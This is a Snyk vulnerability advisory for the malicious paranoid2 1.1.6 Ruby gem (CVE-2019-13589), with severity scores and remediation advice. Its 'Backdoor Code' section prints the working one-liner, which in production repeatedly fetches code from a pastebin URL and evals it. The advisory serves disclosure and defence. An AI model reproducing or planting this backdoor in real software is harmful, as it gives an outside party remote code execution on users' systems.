Homepage
About Snyk

Malicious Package Affecting paranoid2 package, versions =1.1.6

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 1.62% (88th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUBY-PARANOID2-451600
  • published 15 Jul 2019
  • disclosed 14 Jul 2019
  • credit Ruian Duan
Report a new vulnerability Found a mistake?

Introduced: 14 Jul 2019

Malicious CVE-2019-13589 Open this link in a new tab
CWE-506 Open this link in a new tab

How to fix?

Avoid using paranoid2 altogether. Furthermore, Downgrading to v1.1.5 will ensure no malicious code execution is possible.

Overview

paranoid2 is a paranoid models for rails 4

Affected versions of this package are a Malicious Package. paranoid2 1.1.6 for Ruby includes a code-execution backdoor inserted by a third party.

Backdoor Code 

_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}

References